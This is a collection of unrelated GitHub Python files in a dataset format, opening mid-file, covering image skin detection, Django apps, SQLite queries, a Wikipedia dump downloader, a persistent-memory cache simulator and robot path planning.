\",\"}')\n builder.append(\"}\")\n if not last:\n builder.append_line(\", \")\n builder.pop_indent()\n\n builder.append(\")\")\n","repo_name":"Aeolin/html2dash","sub_path":"html2dash.py","file_name":"html2dash.py","file_ext":"py","file_size_in_byte":21955,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"42290470468","text":"import cv2\nimport numpy as np\n\n\ndef ellipse_detect(image):\n \"\"\"\n :param image: 图片路径\n \"\"\"\n skinCrCbHist = np.zeros((256, 256), dtype=np.uint8)\n cv2.ellipse(skinCrCbHist, (113, 155), (23, 15),\n 43, 0, 360, (255, 255, 255), -1)\n\n YCRCB = cv2.cvtColor(image, cv2.COLOR_BGR2YCR_CB)\n (y, cr, cb) = cv2.split(YCRCB)\n skin = np.zeros(cr.shape, dtype=np.uint8)\n (x, y) = cr.shape\n for i in range(0, x):\n for j in range(0, y):\n CR = YCRCB[i, j, 1]\n CB = YCRCB[i, j, 2]\n if skinCrCbHist[CR, CB] > 0:\n skin[i, j] = 255\n dst = cv2.bitwise_and(image, image, mask=skin)\n return dst\n\n\nif __name__ == '__main__':\n ellipse_detect('./data/image.jpg')\n","repo_name":"amifed/dl","sub_path":"utils/segmentation/ellipse_detect.py","file_name":"ellipse_detect.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"6665199820","text":"import logging\nfrom .request import normalize, make_request, And, Condition, Or, Not\nfrom .query import QueryFilter, QuerySelect, QueryChain, QueryOrder, QueryRange,\\\n QueryDistinct, QueryAggregate\n\nfrom .access_point import DEFAULT_PARAMETER\n\ndef _translate_request(request, aliases):\n \"\"\"Translate high-level ``request`` to low-level using ``aliases``.\"\"\"\n if isinstance(request, And):\n return And(*(_translate_request(req, aliases)\n for req in request.sub_requests))\n elif isinstance(request, Or):\n return Or(*(_translate_request(req, aliases)\n for req in request.sub_requests))\n elif isinstance(request, Not):\n return Not(_translate_request(request.sub_request, aliases))\n elif isinstance(request, Condition):\n name = repr(request.property)\n if name in aliases:\n # The complete path has already been selected,\n # Let's use the alias instead !\n new_name = aliases.get(name, name)\n request.property.name = new_name\n request.property.child_property = None\n return request\n elif name in aliases.values():\n return request\n elif \".\".join(name.split(\".\")[:-1] + [\"*\"]) in aliases:\n return request\n else:\n new_name = \"__%s\" % name.replace(\".\", \"_\")\n aliases[name] = new_name\n request.property.name = new_name\n request.property.child_property = None\n return request\n\n\ndef _delegate_to_acces_point(method_name, first_arg_is_a_request=False):\n \"\"\"Create a function delegating ``method_name`` to an access point.\"\"\"\n if first_arg_is_a_request:\n def wrapper(self, access_point_name, request=None, *args, **kwargs):\n \"\"\"Call ``access_point.method_name(request, *args, **kwargs)``.\"\"\"\n access_point = self.access_points[access_point_name]\n request = normalize(access_point.properties, request)\n return getattr(access_point, method_name)(request, *args, **kwargs)\n else:\n def wrapper(self, access_point_name, *args, **kwargs):\n \"\"\"Call ``access_point.method_name(*args, **kwargs)``.\"\"\"\n access_point = self.access_points[access_point_name]\n return getattr(access_point, method_name)(*args, **kwargs)\n # Redefining documentation and name of the wrappers\n # pylint: disable=W0622\n wrapper.__name__ = method_name\n wrapper.__doc__ = \\\n \"Call :meth:`kalamar.access_point.AccessPoint.%s`.\" % method_name\n # pylint: enable=W0622\n return wrapper\n\n\nclass Site(object):\n \"\"\"Kalamar site.\"\"\"\n def __init__(self):\n self.access_points = {}\n self.logger = logging.getLogger(\"dyko\")\n try:\n from logging import NullHandler\n except ImportError:\n class NullHandler(logging.Handler):\n def emit(self, record):\n pass\n self.logger.addHandler(NullHandler())\n\n def register(self, name, access_point):\n \"\"\"Add an access point to this site.\n\n :param name: Identifier string of the added access point.\n :param access_point: Concrete subclass of :class:`AccessPoint`.\n\n \"\"\"\n if name in self.access_points:\n raise RuntimeError(\n \"Site already has an access point named %r.\" % name)\n self.access_points[name] = access_point\n access_point.bind(self, name)\n\n def view(self, access_point_name, aliases=None, request=None, order_by=None,\n select_range=None, distinct=False, aggregate=None, query=None):\n \"\"\"Call :meth:`kalamar.access_point.AccessPoint.view`.\n\n If ``alias`` and ``request`` are given, a query is created from them.\n\n The query is then validated and then passed to the ``view`` method of\n the acess point called ``access_point_name``.\n\n \"\"\"\n access_point = self.access_points[access_point_name]\n if aliases is None:\n aliases = {\"\": \"*\"}\n if query is None:\n # Add dummy selects to be able to filter on those\n chain = []\n aliases = dict(((value, key) for key, value in aliases.items()))\n request = make_request(request)\n request = _translate_request(request, aliases)\n aliases = dict(((value, key) for key, value in aliases.items()))\n chain.append(QuerySelect(aliases))\n chain.append(QueryFilter(request))\n if distinct:\n chain.append(QueryDistinct())\n if order_by is not None:\n chain.append(QueryOrder(order_by))\n if aggregate is not None:\n chain.append(QueryAggregate(aggregate))\n if select_range is not None:\n if hasattr(select_range, \"__iter__\"):\n select_range = slice(*select_range)\n else:\n select_range = slice(select_range)\n chain.append(QueryRange(select_range))\n query = QueryChain(chain)\n query.validate(access_point.properties)\n for line in access_point.view(query):\n for prop_name in [name for name in line if name.startswith(\"__\")]:\n line.pop(prop_name)\n yield line\n\n def from_repr(self, access_point_name, repr, default=DEFAULT_PARAMETER):\n \"\"\"\n Return an item of ``access_point_name`` from the ``repr`` string.\n ``repr`` should have been generated with item.__repr__()\n \"\"\"\n access_point = self.access_points[access_point_name]\n return access_point.loader_from_reference_repr(repr)(None)[0]\n\n create = _delegate_to_acces_point(\"create\")\n delete = _delegate_to_acces_point(\"delete\")\n delete_many = _delegate_to_acces_point(\"delete_many\", True)\n open = _delegate_to_acces_point(\"open\", True)\n search = _delegate_to_acces_point(\"search\", True)\n save = _delegate_to_acces_point(\"save\")\n","repo_name":"Kozea/Dyko","sub_path":"kalamar/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":5986,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"3753054147","text":"#!/usr/bin/env python3\n\na = \"abaxyzzyxf\"\nb = \"noonabbad\"\n\ndef longestPalindrome(word:str)->str:\n \"\"\" Returns a string of longest possible palindrome \"\"\"\n\n try:\n \"\"\" What I'm thinking is creating a dictionary and storing each letter of the word\n provided in the argument. The letter will be the key and the number of times the\n letter appeared will be the value. \"\"\"\n\n palindromes = []\n mapping = {}\n for letter in word:\n if letter not in mapping:\n mapping[letter] = 1\n else:\n mapping[letter] += 1\n\n \"\"\" I'm thinking of removing the item in which the letter appeared only once. Because\n if it only appeared once it means it's either the middle letter of the palindrome or\n it's not included in the longest palindrome. \"\"\"\n\n for item in list(mapping):\n if mapping[item] < 2:\n mapping.pop(item)\n\n \"\"\" Creating a reversed word of the given argument will let me check the index number\n of the letter in a reversed order. \"\"\"\n\n letters = [letter for letter in word]\n letters.reverse()\n reversed_word = \"\".join(letters)\n\n \"\"\" We'll use the dictionary to get the index number of the first and last occurence\n of the letter which appeared multiple times in the provided argument. We use the provided\n argument to get the first occurence and the reversed word of the argument to get the last.\n Then we will slice the palindrome and store it to the list we initialized earlier. \"\"\"\n\n for key in mapping.keys():\n palindromes.append(word[word.index(key): -reversed_word.index(key)]) # add (-) to the reversed_word\n\n print(max(palindromes, key=len))\n return max(palindromes, key=len) # returns the largest\n\n except ValueError: # This line will catch invalid input.\n return \"Invalid input or no palindrome\"\n\n\n\nlongestPalindrome(a)\n","repo_name":"jetarciaga/solutions_engineer_repo","sub_path":"palindrome_level_2.py","file_name":"palindrome_level_2.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3414719400","text":"from subjects import subjects\n\nmarker_default = '✓'\nn_done = 41\n\nwith open(\"README.md\", mode='w') as f:\n f.write(\"# Image-Processing\\n\\n\")\n f.write(\"[画像処理100本ノック](https://qiita.com/yoyoyo_/items/2ef53f47f87dcf5d1e14)をやってみる。\\n\\n\")\n\n f.write(\"## 進捗\\n\\n\")\n f.write(\"| 番号 | 内容 | pyhtonの解答 | 出力画像 |\\n\")\n f.write(\"|:----:|:----:|:----:|:----:|\\n\")\n\n for i, subject in enumerate(subjects):\n marker = marker_default if i < n_done else \"\"\n link_code = \"[{}](https://github.com/HirokiNishimoto/Image_Processing/blob/master/solve_python/solve{}.py)\".format(marker, str(i+1).zfill(2))\n link_jpg = \"[{}](https://github.com/HirokiNishimoto/Image_Processing/blob/master/img/out/q_{}.jpg)\".format(marker, str(i+1).zfill(2))\n f.write(\"| {} | {} | {} | {} |\\n\".format(i+1, subject, link_code, link_jpg))\n\n f.write(\"\\n## 参考および引用元\\n[画像処理100本ノックを作ったった(Qiita)](https://qiita.com/yoyoyo_/items/2ef53f47f87dcf5d1e14)
[画像処理100本ノック!!(github)](https://github.com/yoyoyo-yo/Gasyori100knock)
\\n\")\n","repo_name":"nisshimo/Image_Processing","sub_path":"gen_readme.py","file_name":"gen_readme.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"34593621791","text":"\"\"\"\nDownload it from here:\nhttps://dumps.wikimedia.org/backup-index.html\n\n\n\"\"\"\n\nimport os\n\nimport requests\nfrom gensim.corpora import WikiCorpus\nfrom tqdm import tqdm\n\n\ndef download_file(url, filename):\n response = requests.get(url, stream=True)\n\n total_size = int(response.headers.get(\"content-length\", 0))\n block_size = 1024\n t = tqdm(total=total_size, unit=\"B\", unit_scale=True, desc=filename)\n\n with open(filename, \"wb\") as f:\n for chunk in response.iter_content(chunk_size=block_size):\n if chunk:\n t.update(len(chunk))\n f.write(chunk)\n t.close()\n if total_size != 0 and t.n != total_size:\n print(\"ERROR, something went wrong\")\n\n\nurl = \"https://dumps.wikimedia.your.org/enwiki/20220820/enwiki-20220820-pages-articles-multistream.xml.bz2\"\nfilename = \"enwiki-20220820-pages-articles-multistream.xml.bz2\"\ndownload_file(url, filename)\n\n\ndef extract_text_from_wikipedia_dump(dump_file_path, output_file_path):\n \"\"\"\n Extract and save plain text from a Wikipedia dump.\n\n :param dump_file_path: path to the Wikipedia dump file (*.bz2 file)\n :param output_file_path: path to the output text file\n\n To run: extract_text_from_wikipedia_dump(\"enwiki-latest-pages-articles.xml.bz2\", \"wikipedia_plaintext.txt\")\n\n \"\"\"\n # Create a WikiCorpus object\n wiki = WikiCorpus(dump_file_path, dictionary={})\n\n # Open a file for writing extracted text\n with open(output_file_path, \"w\") as output_file:\n # Iterate over the texts from the dump file and write to the output file\n for i, text in enumerate(wiki.get_texts()):\n # Convert list of tokens to a single string and write to the output file\n output_file.write(\" \".join(text) + \"\\n\")\n\n # Optional: print progress every 10,000 articles\n if (i + 1) % 10000 == 0:\n print(f\"Processed {i + 1} articles\")\n\n print(\"Processing complete!\")\n","repo_name":"jss367/g3po","sub_path":"g3po/wiki_data.py","file_name":"wiki_data.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"42604248018","text":"import json\nimport sqlite3\n\nfrom pr5.utils.generalPurposeReader import get_object_list\n\n\ndef connect_to_db(db):\n connection = sqlite3.connect(db)\n connection.row_factory = sqlite3.Row\n return connection\n\n\ndef create_table(db):\n cursor = db.cursor()\n cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS building_subitem (\n id INTEGER PRIMARY KEY ASC,\n id_building INTEGER REFERENCES building (id),\n name TEXT (255),\n place INTEGER,\n prise INTEGER\n )\n \"\"\")\n\n\ndef insert_subitem_data(db, data):\n cursor = db.cursor()\n cursor.executemany(\"\"\"\n INSERT INTO building_subitem (id_building, name, place, prise)\n VALUES(\n (SELECT id FROM building WHERE name = :name),\n :name, :place, :prise\n )\n \"\"\", data)\n\n db.commit()\n\n\ndef first_query(db, name):\n cursor = db.cursor()\n res = cursor.execute(\"\"\" \n SELECT * \n FROM building_subitem\n WHERE id_building = (SELECT id FROM building WHERE name = ?) \n \"\"\", [name])\n\n for row in res.fetchall():\n item = dict(row)\n print(item)\n\n cursor.close()\n return []\n\n\ndef second_query(db, name):\n cursor = db.cursor()\n res = cursor.execute(\"\"\" \n SELECT\n AVG(place) as avg_place, \n AVG(prise) as avg_prise\n FROM building_subitem\n WHERE id_building = (SELECT id FROM building WHERE name = ?) \n \"\"\", [name])\n\n print(dict(res.fetchone()))\n\n cursor.close()\n return []\n\n\ndef third_query(db, name):\n cursor = db.cursor()\n res = cursor.execute(\"\"\" \n SELECT *\n FROM building_subitem\n WHERE id_building = (SELECT id FROM building WHERE name = ?) \n ORDER BY prise DESC \n \"\"\", [name])\n\n for row in res.fetchall():\n print(dict(row))\n\n cursor.close()\n return []\n\n\nitems = get_object_list('./task_2_var_06_subitem.pkl')\ndatabase = connect_to_db(\"./results/first.db\")\ncreate_table(database)\n# insert_subitem_data(database, items)\nfirst_query(database, 'Дортмунд 1969')\nsecond_query(database, 'Гран-при ФИДЕ 1977')\nthird_query(database, 'Ставангер 1961')\n","repo_name":"daleunixal/data-engineering","sub_path":"pr4/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2429054977","text":"\"\"\" This module is used to facilitate points of integration with the Prompt API that are specific to\n the counseling platform.\n This includes\n 1) Pulling assignments and due dates from Prompt API\n\n Note that there is also Prompt API stuff in snusers (this is where UMS endpoints that Prompt uses\n to obtain user and org details exist)\n\"\"\"\nimport json\nimport requests\nimport sentry_sdk\nimport dateparser\nfrom django.conf import settings\nfrom django.utils import timezone\nfrom snusers.models import Student\nfrom snusers.utilities.prompt_api_manager import PromptAPIManager\nfrom snuniversities.models import StudentUniversityDecision\nfrom sntasks.models import Task, TaskTemplate\n\nENDPOINT = \"/api/assignment-list/\" # Prepended by PROMPT_API_BASE; appended by student's UMS ID\nTEST_STUDENT_SLUG = \"ce80f4c6-57b4-45fe-8f11-87b23803eff6\"\nTEST_COUNSELOR_SLUG = \"d4daacd1-3ff8-4a5e-8e90-57bf5f3e7373\"\n\n\nclass CounselingPromptAPIManagerException(Exception):\n pass\n\n\nclass CounselingPromptAPIManager:\n def __init__(self):\n if not (settings.PROMPT_API_BASE and settings.PROMPT_API_TOKEN):\n raise CounselingPromptAPIManagerException(\"Missing Prompt API Details\")\n\n def update_assignment_tasks(self, student: Student):\n \"\"\" Pull assignments (with due dates) for a student from Prompt. Create tasks in UMS\n Returns queryset of student's Prompt Task obejcts\n \"\"\"\n # Obtain the tasks from prompt\n slug = str(student.slug) if not (settings.DEBUG or settings.TESTING) else TEST_STUDENT_SLUG\n school_list = list(\n student.student_university_decisions.filter(is_applying=StudentUniversityDecision.YES).values_list(\n \"university__iped\", flat=True\n )\n )\n response = requests.post(\n f\"{settings.PROMPT_API_BASE}{ENDPOINT}{slug}/\",\n json={\"schools\": school_list},\n headers={\"Authorization\": f\"Token {settings.PROMPT_API_TOKEN}\"},\n )\n if response.status_code == 404:\n # Try to obtain JWT for student, which creates their Prompt account if it doesn't exist\n prompt_user_api_manager = PromptAPIManager()\n prompt_user_api_manager.obtain_jwt(student)\n response = requests.post(\n f\"{settings.PROMPT_API_BASE}{ENDPOINT}{slug}/\",\n json={\"schools\": school_list},\n headers={\"Authorization\": f\"Token {settings.PROMPT_API_TOKEN}\"},\n )\n\n if response.status_code != 200:\n with sentry_sdk.configure_scope() as scope:\n scope.set_context(\n \"Prompt Assignment List Request\",\n {\"student\": slug, \"status\": response.status_code, \"response\": response.content},\n )\n ex = CounselingPromptAPIManagerException(\"Prompt API Error (AssignmentList)\")\n if settings.DEBUG or settings.TESTING:\n print(f\"Prompt API Manager response {response.status_code}\")\n print(response.content)\n else:\n sentry_sdk.capture_exception(ex)\n raise ex\n\n data = json.loads(response.content)\n for assignment in data[\"assignments\"]:\n # Create task due date\n task, _ = Task.objects.get_or_create(\n for_user=student.user, prompt_id=assignment[\"id\"], task_type=TaskTemplate.ESSAY\n )\n task.title = assignment[\"name\"]\n if len(assignment[\"ipeds\"]) == 1:\n task.student_university_decisions.set(\n list(student.student_university_decisions.filter(university__iped__in=assignment[\"ipeds\"]))\n )\n task.due = dateparser.parse(assignment[\"next_due_date\"]) if assignment.get(\"next_due_date\") else None\n\n # Tasks with due date need to be made visible to students so they appear in reminders\n task.visible_to_counseling_student = bool(task.due)\n\n task.completed = timezone.now() if assignment[\"marked_complete\"] else None\n task.save()\n\n # Delete all of the tasks that no longer come over from Prompt\n Task.objects.filter(task_type=TaskTemplate.ESSAY, for_user=student.user).exclude(prompt_id=\"\").exclude(\n prompt_id__in=[x[\"id\"] for x in data[\"assignments\"]]\n ).delete()\n\n return Task.objects.filter(for_user=student.user, task_type=TaskTemplate.ESSAY).exclude(prompt_id=\"\")\n","repo_name":"kkumarcodes/school-management","sub_path":"school-management/sncounseling/utilities/counseling_prompt_api_manager.py","file_name":"counseling_prompt_api_manager.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"14476553630","text":"class Livro:\n def __init__(self, titulo, autor, ano_publicacao):\n self.titulo = titulo\n self.autor = autor\n self.ano_publicacao = ano_publicacao\n self.disponivel = True\n\n def emprestar(self):\n if self.disponivel:\n self.disponivel = False\n print(f\"O livro '{self.titulo}' foi emprestado.\")\n else:\n print(f\"O livro '{self.titulo}' não está disponível para empréstimo.\")\n\n def devolver(self):\n if not self.disponivel:\n self.disponivel = True\n print(f\"O livro '{self.titulo}' foi devolvido.\")\n else:\n print(f\"O livro '{self.titulo}' já está disponível.\")\n\n def apresentar(self):\n status = \"Disponível\" if self.disponivel else \"Indisponível\"\n print(f\"Título: {self.titulo}\")\n print(f\"Autor: {self.autor}\")\n print(f\"Ano de Publicação: {self.ano_publicacao}\")\n print(f\"Status: {status}\")\n print()\n\n\nclass Biblioteca:\n def __init__(self):\n self.livros = []\n\n def adicionar_livro(self, livro):\n self.livros.append(livro)\n print(f\"O livro '{livro.titulo}' foi adicionado à biblioteca.\")\n\n def listar_livros(self):\n if len(self.livros) == 0:\n print(\"A biblioteca não possui livros.\")\n else:\n print(\"Livros disponíveis na biblioteca:\")\n for livro in self.livros:\n livro.apresentar()\n\n\n# Testando o sistema de biblioteca\nlivro1 = Livro(\"A Guerra dos Tronos\", \"George R.R. Martin\", 1996)\nlivro2 = Livro(\"O Senhor dos Anéis\", \"J.R.R. Tolkien\", 1954)\nlivro3 = Livro(\"Harry Potter e a Pedra Filosofal\", \"J.K. Rowling\", 1997)\n\nbiblioteca = Biblioteca()\n\nbiblioteca.adicionar_livro(livro1)\nbiblioteca.adicionar_livro(livro2)\nbiblioteca.adicionar_livro(livro3)\n\nlivro2.emprestar()\nlivro1.emprestar()\n\nbiblioteca.listar_livros()\n\nlivro2.devolver()\nlivro1.devolver()\n\nbiblioteca.listar_livros()\n","repo_name":"Angelotravain/LearningPython","sub_path":"2_Bimestre/Atividade_2.py","file_name":"Atividade_2.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18740015234","text":"from engines.replayengine import CachelineBase, CacheBase, PermutatorBase, ReplayEngineBase\nfrom mem.memoryoperations import TXStart, PMDKCall, TXEnd, Store, Flush, Fence\nfrom misc.utils import Rangeable, range_cmp\nfrom mem.cachenumbers import CACHELINE_BYTES, ATOMIC_WRITE_BYTES, get_cacheline_address\nfrom logging import getLogger\nimport csv\n\n# A YatCachelineBucket is an address range\n# It maintains a list of stores writing to this address range\nclass YatCachelineBucket(Rangeable):\n def __init__(self, address, size):\n self.address = address\n self.size = size\n self.stores_list = []\n\n def accept_store(self, store_op):\n self.stores_list.append(store_op)\n\n def accept_flush(self):\n for store_op in self.stores_list:\n store_op.flushed = 1\n\n def flush(self):\n #TODO need to write to the memory\n self.stores_list = \\\n list( filter(lambda x: x.flushed == 0, self.stores_list))\n\n def flush_all(self):\n #TODO need to write to the memory\n self.stores_list = []\n\n def is_empty(self):\n return len(self.stores_list) == 0\n\n def get_num_of_stores(self):\n return len(self.stores_list)\n\n def get_stores(self):\n return self.stores_list\n\n def get_base_address(self):\n return self.address\n\n def get_max_address(self):\n return self.address + self.size\n\n# A YatCacheline is a list of buckets\nclass YatCacheline(CachelineBase):\n def __init__(self, address, size, size_per_bucket):\n self.address = address\n self.size = size\n self.size_per_bucket = size_per_bucket\n self.num_of_buckets = int(size / size_per_bucket)\n self.buckets = []\n for index in range(0, self.num_of_buckets):\n bucket_address = self.address + index * size_per_bucket\n cacheline_bucket = YatCachelineBucket(bucket_address, size_per_bucket)\n self.buckets.append(cacheline_bucket)\n\n def get_bucket(self, store_op):\n for bucket in self.buckets:\n if range_cmp(bucket, store_op) == 0:\n assert(bucket.get_base_address() <= store_op.get_base_address())\n assert(bucket.get_max_address() >= store_op.get_max_address())\n return bucket\n return None\n\n def can_accept_store(self, store_op):\n if self.get_bucket(store_op) == None:\n return False\n else:\n return True\n\n def can_accept_flush(self, flush_op):\n if self.address == flush_op.get_base_address() and \\\n self.address + self.size == flush_op.get_max_address():\n return True\n else:\n return False\n\n def accept_store(self, store_op):\n bucket = self.get_bucket(store_op)\n assert(bucket != None)\n bucket.accept_store(store_op)\n\n def accept_flush(self):\n for bucket in self.buckets:\n bucket.accept_flush()\n\n def flush(self):\n for bucket in self.buckets:\n bucket.flush()\n\n def flush_all(self):\n for bucket in self.buckets:\n bucket.flush_all()\n\n def is_empty(self):\n for bucket in self.buckets:\n if bucket.is_empty() == False:\n return False\n return True\n\n def get_num_of_stores(self):\n num_of_stores = 0\n for bucket in self.buckets:\n num_of_stores += bucket.get_num_of_stores()\n return num_of_stores\n\n def get_stores(self):\n stores = []\n for bucket in self.buckets:\n stores.append(bucket.get_stores())\n return stores\n\n# YatCache is a list of cacheline\nclass YatCache(CacheBase):\n def __init__(self):\n self.cachelines = []\n\n def accept(self, op):\n def accept_store(store_op):\n cacheline = None\n for cacheline_it in self.cachelines:\n if (cacheline_it.can_accept_store(store_op)):\n cacheline = cacheline_it\n break\n if cacheline == None:\n address = get_cacheline_address(store_op.get_base_address())\n cacheline = YatCacheline(address,\n CACHELINE_BYTES,\n ATOMIC_WRITE_BYTES)\n self.cachelines.append(cacheline)\n cacheline.accept_store(store_op)\n\n def accept_flush(flush_op):\n for cacheline in self.cachelines:\n if (cacheline.can_accept_flush(flush_op)):\n cacheline.accept_flush()\n break\n\n time_to_replay_and_flush = False\n if isinstance(op, TXStart):\n pass\n elif isinstance(op, TXEnd):\n pass\n elif isinstance(op, PMDKCall):\n pass\n elif isinstance(op, Store):\n accept_store(op)\n elif isinstance(op, Flush):\n accept_flush(op)\n elif isinstance(op, Fence):\n time_to_replay_and_flush = True\n else:\n raise NotSupportedOperationException(op)\n return time_to_replay_and_flush\n\n def flush(self):\n empty_cachelines = []\n for cacheline in self.cachelines:\n cacheline.flush()\n if cacheline.is_empty():\n empty_cachelines.append(cacheline)\n for cacheline in empty_cachelines:\n self.cachelines.remove(cacheline)\n\n\n def flush_all(self):\n for cacheline in self.cachelines:\n cacheline.flush_all()\n self.cachelines = []\n\n def get_cachelines(self):\n return self.cachelines\n\n def get_stores(self):\n stores = []\n for cacheline in self.cachelines:\n stores.append(cacheline.get_stores())\n return stores\n\nclass YatPermutator(PermutatorBase):\n def __init__(self, cache):\n self.cache = cache\n\n # (size of CL + 1) * ... * (size of CL + 1) - 1\n def run(self):\n # Permute all stores in the cache\n permutation_count = 1\n for cacheline in self.cache.get_cachelines():\n num_of_stores = cacheline.get_num_of_stores()\n permutation_count *= num_of_stores + 1\n permutation_count -= 1\n return permutation_count\n\nclass YatEngine(ReplayEngineBase):\n # initialization\n def __init__(self):\n self.cache = YatCache()\n self.permutator = YatPermutator(self.cache)\n self.permutation_count_list = []\n self.permutation_count = 0\n\n # set the trace\n def set_trace(self, trace):\n self.trace = trace\n\n # traverse all the operations in the trace\n def run(self):\n # start from the first tx\n ops = self.trace.atomic_write_ops\n first_tx_start_index = self.trace.atomic_write_ops_tx_ranges[0][0]\n ops = ops[first_tx_start_index:]\n for op in ops:\n if isinstance(op, TXStart):\n self.permutation_count = 0\n if isinstance(op, TXEnd):\n self.permutation_count_list.append(self.permutation_count)\n if self.cache.accept(op) == True:\n getLogger().debug(\"Before Fence: \" +\n str(self.cache.get_stores()))\n self.permutation_count += self.permutator.run()\n self.cache.flush()\n getLogger().debug(\"After Fence: \" +\n str(self.cache.get_stores()))\n getLogger().debug(\"In the end: \" + str(self.cache.get_stores()))\n getLogger().debug(\"permutation_count_list = \" +\n str(self.permutation_count_list))\n\n self.epilogue()\n\n # write the result into a file\n def epilogue(self):\n with open('yat.csv', 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(['op', 'per_op_count', \"total_count\"])\n op_count = 0\n total = 0\n for permutation_count in self.permutation_count_list:\n total += permutation_count\n writer.writerow([op_count, permutation_count, total])\n op_count += 1\n","repo_name":"cosmoss-jigu/witcher","sub_path":"replay/engines/yat/yatengine.py","file_name":"yatengine.py","file_ext":"py","file_size_in_byte":8072,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"5"} +{"seq_id":"5283204346","text":"from django.urls import path\nfrom . import views\n\n\napp_name = 'persona_app'\n\nurlpatterns = [\n path(\n '', \n views.InicioView.as_view(), \n name='Inicio'\n ),\n path(\n 'listar-todo-empleados/', \n views.ListAllEmpleado.as_view(),\n name = 'listar_empleado'\n ),\n path(\n 'lista-by-area//', \n views.ListByAreaEmpleado.as_view(),\n name= 'empleados_area'\n ),\n path(\"lista-by-trabajo//\", views.ListByBojEmpleado.as_view()),\n path(\"buscar-empleado/\", views.ListEmpleadosByKword.as_view()),\n path(\"listar-habilidades-empleado//\", views.ListHabilidadesEmpleado.as_view()),\n path(\n 'ver-empleado//', \n views.EmpleadoDetailView.as_view(),\n name='detalle_empleado'\n ),\n path(\n 'add-empleado/', \n views.EmpleadoCreateView.as_view(),\n name='registrar_empleado' \n ),\n path('success/', views.SuccessView.as_view(), name='correcto'),\n path(\n 'update-empleado//', \n views.EmpleadoUpdateView.as_view(), \n name='modificar_empleado',\n ),\n path(\n 'delete-empleado//', \n views.EmpleadoDeleteView.as_view(), \n name='eliminar_empleado',\n ),\n path(\n 'lista-empleado-admin/',\n views.ListAllEmpleadoAdmin.as_view(),\n name = 'lista_empleado_admin'\n )\n]\n","repo_name":"HectorLiAd/empleado","sub_path":"applications/persona/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24319010769","text":"import unittest\nfrom check_balanced import is_balanced\nfrom tree_node import TreeNode\n\nclass TestCheckBalanced(unittest.TestCase):\n def setUp(self):\n self.tree1 = TreeNode(1)\n self.tree1.left = TreeNode(2)\n self.tree1.right = TreeNode(3)\n self.tree1.left.left = TreeNode(4)\n self.tree1.left.right = TreeNode(5)\n self.tree1.right.left = TreeNode(6)\n self.tree1.right.right = TreeNode(7)\n\n self.tree2 = TreeNode(1)\n self.tree2.left = TreeNode(2)\n self.tree2.left.left = TreeNode(3)\n\n self.tree3 = TreeNode(1)\n\n def test_is_balanced(self):\n self.assertTrue(is_balanced(self.tree1))\n self.assertFalse(is_balanced(self.tree2))\n self.assertTrue(is_balanced(self.tree3))\n","repo_name":"weixuanteo/ctci-solutions","sub_path":"trees_graphs/tests/test_check_balanced.py","file_name":"test_check_balanced.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2594191479","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# from drive import RosAriaDriver\n# robot=RosAriaDriver('/PIONIER6')\n\nimport json\nimport time\nimport copy \nfrom OccupancyGrid import world_map\nimport PathPlanning as pp\nimport RobotControl\n\nscan = []\ntheta = []\ndata = list()\noutputPath = \"./output/\"\ninputPath = \"./datafiles/\"\n\n\ndef readJSON(filename):\n json_file = open(filename)\n data = json.load(json_file)\n return data\n\n\ndef saveJSON(filename, data):\n with open(filename, 'w') as outfile:\n json.dump(data, outfile)\n\n\ndef robotScanData():\n data = []\n for i in range(6):\n dataPoint = {}\n dataPoint['pose'] = robot.GetPose()\n dataPoint['scan'] = robot.ReadLaser()\n data.append(dataPoint)\n time.sleep(1)\n\n saveJSON(inputPath + \"robotScan.JSON\", data)\n\n\nif __name__ == '__main__':\n wm = world_map(20, 20, 0.1)\n wm.initialize_map()\n\n #data = readJSON(inputPath + \"robotTrap_01.JSON\")\n # data = readJSON(inputPath + \"map_boxes_0.json\")\n # data = readJSON(inputPath + \"map_boxes_1.json\")\n # data = readJSON(inputPath + \"map_round.json\")\n data = readJSON(inputPath + \"robotWandering_01.JSON\")\n\n for iteration in data:\n wm.updateHitCells(iteration)\n #print(iteration[u'pose'])\n # for i in range(3):\n # wm.updateHitCells(data[i])\n #print(data[-1][u'pose'])\n\n pp.robotRadius=0.05\n pp_wm=copy.deepcopy(wm)\n pp.enlargeObstacles(pp_wm)\n\t\n startPoint = [(x//pp_wm.cell_size)*pp_wm.cell_size for x in data[-1][u'pose'][0:2]]\n goalPoint = [(x//pp_wm.cell_size)*pp_wm.cell_size for x in data[0][u'pose'][0:2]]\n print(startPoint,goalPoint)\n\n RobotControl.ControlRobot(probabilityMap, robotPosition, goalPoint)\n \n WaveMap = pp.blastWave(pp_wm, startPoint, goalPoint)\n \t\n PathPoints = pp.findPathPoints(WaveMap, startPoint, goalPoint)\n print(PathPoints)\n 